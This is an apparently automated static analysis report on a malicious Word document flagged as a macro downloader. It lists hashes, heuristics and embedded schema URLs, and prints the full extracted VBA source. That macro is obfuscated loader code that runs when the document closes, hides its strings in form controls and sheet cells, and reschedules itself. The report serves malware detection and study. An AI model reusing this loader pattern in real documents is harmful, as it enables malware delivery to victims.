Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 db7e6dd41bfc0093…

MALICIOUS

Office (OOXML)

83.3 KB Created: 2021-01-29 09:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 32b9c0d48b08f533a81e1e76e6c34aed SHA-1: 31767d3887a68ffd5a037db022758002a7cac50b SHA-256: db7e6dd41bfc009321cc191be5f0f9b573b1c0ba4677f5dfa7b045c7f2b78ed9
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ep = CreateObject(UserForm1.af & UserForm1.hd)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set vl = CallByName(ep.Workbooks, UserForm1.gf & UserForm1.sr, 1, UserForm2.ComboBox1, , , , UserForm1.qt)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7010 bytes
SHA-256: 95ea3357ed425a497b2c51740fa9495ea32fc75d79dde845fae0df628198e2ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ixv, zb2, x, d9, qj, ep, ef, nol, j8, ah, pb, am, b3t, hz, jw, f8

Sub Document_Close()

ol

End Sub

Sub ol()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set ep = CreateObject(UserForm1.af & UserForm1.hd)

k6 = UserForm2.ComboBox4

ep.DisplayAlerts = False

ag = UserForm2.ComboBox23

b4 = 1301

n9 = 0

Err.Number = 0

ab = UserForm2.ComboBox5

While b4 <> 0 And n9 < 32

Set vl = CallByName(ep.Workbooks, UserForm1.gf & UserForm1.sr, 1, UserForm2.ComboBox1, , , , UserForm1.qt)

b4 = Err.Number

n9 = n9 + 16

Wend

If b4 <> 0 Then

ErrHandler:

gyt = CallByName(Application, UserForm1.py & UserForm1.po, 2)

wg = UserForm2.ComboBox26

If gyt <> False Then

qu = UserForm2.ComboBox24

Set o2 = CreateObject(UserForm1.bh & UserForm1.k0)

CallByName o2.Documents, UserForm1.gf & UserForm1.sr, 1, ActiveDocument.FullName, , True

CallByName o2, UserForm1.o & UserForm1.uax, 1, Now + TimeSerial(0, 0, 2), UserForm1.ma0 & UserForm1.g4 & "ol"

Else

usp = UserForm2.ComboBox19

CallByName Application, UserForm1.o & UserForm1.uax, 1, Now + TimeSerial(0, 0, 17), UserForm1.ma0 & UserForm1.g4 & "ol"

End If

ep.Quit

Exit Sub

End If

Dim l1

Set l1 = ep.sheets(1)

ey = UserForm2.ComboBox12

rx = "'"

f8 = ep.sheets(5).Cells(1, 1)

If Len(f8) < 1 Then

If ep.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

zbl = ep.sheets(1).Cells(113, 43).Value

hs = ep.sheets(1).Cells(59, 49).Value

ah = ep.sheets(1).Cells(135, 11).Value

a = UserForm2.ComboBox28

pb = ep.sheets(2).Cells(74, 25).Value

qj = ep.sheets(2).Cells(76, 31).Value

p2 = ep.sheets(2).Cells(109, 55).Value

yl = l1.Cells(143, 33).Value

cd = ep.sheets(3).Cells(113, 1).Value

yfe = ep.sheets(2).Cells(143, 20).Value

eu = UserForm2.ComboBox7

ne = ep.sheets(1).Cells(29, 52).Value

b3t = ep.sheets(2).Cells(97, 37).Value

ef = l1.Cells(109, 14).Value

j8 = ep.sheets(3).Cells(130, 46).Value

nqr = ep.sheets(3).Cells(1, 60).Value

t8v = ep.sheets(2).Cells(131, 40).Value

am = l1.Cells(109, 52).Value

gh = UserForm2.ComboBox20

rn = ep.sheets(1).Cells(94, 10).Value

zx = ep.sheets(2).Cells(143, 55).Value

ixv = ep.sheets(3).Cells(97, 25).Value

tb = ep.sheets(3).Cells(42, 52).Value

mc = l1.Cells(65, 24).Value

nol = ep.sheets(3).Cells(22, 10).Value

lfw = UserForm2.ComboBox25

zb2 = ep.sheets(3).Cells(6, 5).Value

pj = ep.sheets(3).Cells(8, 6).Value

a2 = ep.sheets(2).Cells(41, 32).Value

jw = ""

Set Sh1 = ep.sheets(4)

g6 = 1

a0 = True

While a0

px = Sh1.Cells(g6, 1).Value

If Len(px) < 1 Then

a0 = False

Else

jw = jw & px

End If

g6 = g6 + 1

Wend

pc = CallByName(ep, ne, 2)

na = UserForm2.ComboBox22

mv = UserForm2.ComboBox27

UserForm1.n57.Value = yl & pc & zx

m9 = UserForm2.ComboBox10

UserForm1.d4.Value = hs

CallByName CreateObject(a2), mc, 1, UserForm1.n57, rn, UserForm1.d4

Set kz = CreateObject(zbl)

Set l5s = CallByName(kz, p2, 2)

Set de = CallByName(l5s, pj, 1)

Set j8 = CallByName(kz, j8, 2)

kt = UserForm2.ComboBox24

Set d9 = kz

UserForm5.ComboBox1 = "yt"

Set ixv = CallByName(hz, ixv, 2)

nol = CallByName(ixv, nol, 2)

UserForm1.hi.Value = tb & cd

UserForm3.ComboBox1 = yfe

ih = UserForm2.ComboBox3

UserForm1.hi.Value = nqr

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = nol

kz = ik

ja = UserForm2.ComboBox16

vl = tz

l1 = xdy

l5s = h2

de = jv

j8 = E

ah = xh

pb = dn

hz = fw

ixv = ix

qc = UserForm2.ComboBox5

d9 = j3

ce = UserForm2.ComboBox13

DoEvents

CallByName ep, t8v, 1

ep = m53

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D2E872CE-D407-4A02-907B-8D1E0C8C82BC}{6D68C8CF-13A1-46B9-B464-81B7A2FD17FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{B301D62D-6D72-4CFA-8F72-8791F68EF30C}{E616241E-D4D3-4E47-B115-DC37E0CF2B4E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 dk6 = UserForm2.Controls.Count - 1
 
 
 
 

 db = ""
 For r4 = 1 To dk6 Step 2
 db = db & UserForm2.Controls.Item(r4)
 Next

xny = UserForm2.ComboBox9


 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"

b8 = UserForm2.ComboBox27

 ComboBox1.AddItem db

o1 = UserForm2.ComboBox4

 ComboBox1.AddItem "gz"
 
 
 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{D4B047ED-3B5E-42EF-A959-87E5F1A44114}{ED8F5FC5-0B66-4F08-9167-0637296C7FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ixv, ActiveDocument.ef, VbMethod, 1, ActiveDocument.nol

gq = UserForm2.ComboBox13

 CallByName ActiveDocument.ixv, ActiveDocument.zb2, VbMethod, UserForm1.hi.Value

kd = UserForm2.ComboBox16

End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{7EA69B8C-04EE-4DD6-A709-9AEFAE627512}{81F39DE9-C4B4-42DA-A52E-A3E6B14D2AEA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.d9, ActiveDocument.qj, VbMethod, UserForm1.hi.Value, ActiveDocument.jw, ActiveDocument.f8
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{9B38F8C6-80C0-4608-A826-6AFBEDE29EC4}{3EA54114-A409-48E1-A094-4FAB5285E53E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ah = CallByName(ActiveDocument.j8, ActiveDocument.ah, VbGet)
 Set ActiveDocument.pb = CallByName(ActiveDocument.ah, ActiveDocument.pb, VbGet)
 Set ActiveDocument.hz = CallByName(ActiveDocument.pb, ActiveDocument.am, VbMethod, ActiveDocument.b3t)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: a08112b5b8f295475353253837e330b35511622ec1949a71c37817eeefd5aebf
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.